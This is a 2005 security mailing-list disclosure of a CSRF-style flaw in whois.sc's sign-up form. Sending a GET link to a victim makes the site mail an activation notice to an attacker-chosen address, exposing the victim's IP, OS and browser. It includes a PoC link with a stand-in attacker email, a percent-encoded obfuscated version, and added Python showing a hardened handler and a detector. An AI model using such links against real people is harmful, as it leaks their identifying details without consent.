Message-ID: <b7a807650511020853w7f9e1848g8de46f1a9159770a@mail.gmail.com>
Date: Wed Nov  2 20:01:21 2005
From: unknown.pentester at gmail.com (unknown unknown)
Subject: whois.sc not-big-deal hole

Title: whois.sc not-big-deal hole
Server-side risk: none
Client-side risk: low risk (private info revealed about the user)

Description:

This might not even be considered a proper security hole, but I
thought it's an interesting way to get the following information about
a user:

- IP Address
- Operating system
- Web browser version

This information can easily be obtained by "tricking" someone into visiting
your website and then checking the web server logs. Email headers also
help, not to mention loud OS detection tools such as xprobe2 and nmap
(which only work if you're lucky and the "victim" doesn't sit behind a
firewall that blocks all incoming traffic).

In this case, however, the scenario is a little different: we abuse the
sign-up service of an existing website for our own purposes (enumeration).
The request is made from the victim's browser, but the activation mail it
triggers is sent to whatever address the attacker put in the link, which is
how the visitor's details reach the attacker.

The only limitation of this "trick" is that the attacker needs a different
email address for each attack, because whois.sc sets the account's
activation status to "pending" after the first activation request for a
given address.


The original request to sign-up for an account is a POST request
*similar* to the following:


POST http://www.whois.sc/members/process.html HTTP/1.1
Host: www.whois.sc
Content-Length: 48

action=newaccount&doneurl=&email=test%40test.com


However, we can change the request from POST to GET and the application
will happily process the query: the same parameters are accepted in the
query string, which turns a form submission into a plain link that can be
mailed to anyone (the doneurl value below is a double-encoded "/reverse-ip/"):

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com
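The root cause on the server side is a handler that reads its parameters from wherever they arrive and never checks the request method or ties the action to the user's own session. The following is an added example, not whois.sc's code: a hypothetical minimal model of the sign-up endpoint in its weak form beside a hardened form that insists on POST and on a CSRF token bound to a session cookie. Request objects, the "sid" cookie name and the HMAC-based token are all assumptions for the illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# A request is modelled as a dict: method, url, body (form-encoded), cookies.
# This is an illustrative model, not the real whois.sc application.

def _params_any_method(req):
    """Merge query-string and body parameters regardless of HTTP method.
    This is exactly what lets the POST form be replayed as a GET link."""
    params = parse_qs(urlsplit(req["url"]).query)
    if req.get("body"):
        params.update(parse_qs(req["body"]))
    return {k: v[0] for k, v in params.items()}

def process_vulnerable(req):
    """Weak handler: any method, no token, acts on the supplied e-mail."""
    p = _params_any_method(req)
    if p.get("action") == "newaccount" and "email" in p:
        # The real site would send the activation mail here, to an address
        # the visitor never chose.
        return 200, f"activation mail queued for {p['email']}"
    return 400, "bad request"

# Per-process key for the CSRF token (assumption; a real app keeps this in config).
SECRET = secrets.token_bytes(32)

def csrf_token(session_id):
    """Token the form would embed; derived from the session cookie only."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def process_hardened(req):
    """Hardened handler: POST only, body parameters only, valid CSRF token."""
    if req["method"] != "POST":
        return 405, "method not allowed"
    p = {k: v[0] for k, v in parse_qs(req.get("body", "")).items()}
    sid = req.get("cookies", {}).get("sid", "")
    token = p.get("csrf", "")
    if not sid or not hmac.compare_digest(token, csrf_token(sid)):
        return 403, "missing or invalid CSRF token"
    if p.get("action") == "newaccount" and "email" in p:
        return 200, f"activation mail queued for {p['email']}"
    return 400, "bad request"

if __name__ == "__main__":
    # Constructed request: the GET link from the advisory, as a victim's browser would send it.
    link = {"method": "GET", "cookies": {}, "body": "",
            "url": "http://www.whois.sc/members/process.html"
                   "?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com"}
    print("vulnerable:", process_vulnerable(link))   # (200, ...)
    print("hardened:  ", process_hardened(link))     # (405, ...)
```

The method check alone stops the mailed link, but only the session-bound token stops an attacker from hosting a hidden POST form that a victim's browser submits on their behalf, so both checks belong together.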


PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com


Replace "attacker%40evilmail.com" in the previous link with your own
email address (e.g. myself%40gmail.com) and send the link to the "victim".


We could also obfuscate our email address by percent-encoding every
character, so the address is not readable in the link:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D


Note: "%40" is the percent-encoded form of "@" (0x40). For a good resource
to convert strings between encodings check out
http://www.thedumbterminal.co.uk/php/stringdecode.php
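The encoded link above decodes back to the same parameters, and the doneurl value is encoded twice, so anyone reviewing mail or proxy logs for this trick has to normalise before matching. This is an added example, not part of the original post: it reproduces the full percent-encoding of the address, decodes repeatedly until the value stops changing, and flags sign-up links to process.html whatever encoding the email arrived in. The URLs are the ones from the post; the matching rule is an assumption for illustration.

```python
from urllib.parse import parse_qs, unquote, urlsplit

def hex_encode_all(s):
    """Percent-encode every byte, letters included, as the obfuscated PoC does."""
    return "".join(f"%{b:02X}" for b in s.encode("utf-8"))

def fully_decode(s, max_rounds=5):
    """Undo repeated percent-encoding until the string stops changing
    (bounded, so a value that keeps producing '%' sequences cannot loop forever)."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            return s
        s = decoded
    return s

def normalized_params(url):
    """Query parameters with every layer of percent-encoding removed."""
    query = urlsplit(url).query
    return {k: fully_decode(v[0]) for k, v in parse_qs(query, keep_blank_values=True).items()}

def is_signup_link(url):
    """Detection rule (assumption): a link to /members/process.html that creates an
    account for a supplied e-mail is the shape of the trick, however it is encoded."""
    path = urlsplit(url).path
    p = normalized_params(url)
    return (path.endswith("/members/process.html")
            and p.get("action") == "newaccount"
            and "email" in p)

if __name__ == "__main__":
    # Constructed input: the obfuscated link from the post.
    link = ("http://www.whois.sc/members/process.html?action=newaccount"
            "&doneurl=%252Freverse-ip%252F&email=" + hex_encode_all("attacker@evilmail.com"))
    print(link)
    print(normalized_params(link))   # email back in clear, doneurl '/reverse-ip/'
    print(is_signup_link(link))      # True
```

Decoding to a fixed point rather than once is what catches the double-encoded doneurl; a single-pass filter would still see "%2Freverse-ip%2F" and could miss a rule written against the literal path.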



Regards,

pagvac
Earth, SOLAR SYSTEM
